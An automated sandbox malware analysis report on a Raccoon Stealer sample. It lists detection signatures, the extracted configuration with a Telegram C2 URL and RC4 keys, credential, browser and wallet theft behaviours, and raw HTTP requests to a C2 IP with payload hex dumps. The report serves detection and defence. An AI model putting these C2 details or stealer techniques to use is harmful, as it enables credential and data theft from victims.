Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetect.malware1.14529.6378 (renamed file extension from 6378 to exe)
Analysis ID: 491833
MD5: e283621cd5dea00d95791a88eecda925
SHA1: c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256: 2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
Tags: exe
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Binary contains a suspicious time stamp
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Virustotal: Detection: 33% Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe ReversingLabs: Detection: 37%
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 1_2_0042A130
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 1_2_00429F5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 1_2_00434A5F

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043EFDD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49745 -> 185.138.164.150:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 185.138.164.150:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/agrybirdsgamerept
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1405Host: 185.138.164.150
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:24 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:28 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
